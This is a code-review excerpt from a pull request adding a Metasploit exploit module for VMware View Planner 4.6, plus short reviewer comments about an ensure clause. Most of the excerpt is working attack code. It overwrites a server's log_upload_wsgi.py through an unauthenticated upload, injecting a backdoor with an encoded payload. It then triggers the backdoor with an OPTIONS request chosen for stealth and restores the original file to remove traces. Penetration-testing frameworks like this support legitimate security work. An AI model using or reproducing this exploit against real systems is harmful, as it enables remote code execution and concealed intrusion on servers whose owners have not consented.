modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb

```diff
@@ -0,0 +1,144 @@
+      return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
+    end
+
+    @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
+
+    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
+      return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
+    end
+
+    CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
+  end
+
+  # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
+  # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
+  def upload_file(content)
+    mime = Rex::MIME::Message.new
+    mime.add_part(content, 'application/octet-stream', nil, 'form-data; name="logfile"; filename="log_upload_wsgi.py"')
+    mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py"}', nil, nil, 'form-data; name="logMetaData"')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'logupload'),
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
+    )
+    unless res.to_s.include?('File uploaded successfully.')
+      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded sucessfully!")
+    end
+  end
+
+  def exploit
+    # Here we want to grab our template file, taken from a clean install but
+    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
+    # with the payload we want to execute.
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'rb')
+    file_content = f_handle.read
+    f_handle.close
+
+    payload.encoded.gsub!(/"/, '\\"')
+    file_content['PAYLOAD'] = payload.encoded
+
+    # Now that things are primed, upload the file to the target.
+    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
+    upload_file(file_content)
+    print_good('Backdoor uploaded!')
+
+    # Use the OPTIONS request to trigger the backdoor. Technically this
+    # could be any other method including invalid ones like BACKDOOR, but for
+    # the purposes of stealth lets use a legitimate one.
+    print_status('Sending request to execute the backdoor!')
+    send_request_cgi(
+      'method' => 'OPTIONS',
+      'uri' => normalize_uri(target_uri.path, 'logupload')
+    )
+
+    # At this point we should have our shell after waiting a few seconds,
+    # so lets now restore the original file so we don't leave anything behind.
+    print_status('Reuploading the original code to remove the backdoor!')
+    upload_file(@original_content)
+    print_good('Original file restored, enjoy the shell!')
```

Comment:
Is it worth wrapping this in `ensure`?

Reply:
Fair point, thats actually a good point, as if anything fails we would want to always try and restore the original file regardless of what happens.

Reply:
Wrapped this in the `ensure` clause as requested with https://github.com/rapid7/metasploit-framework/pull/14875/commits/d3918f5054b14b263b89dc6511f64c8fbf7d59c1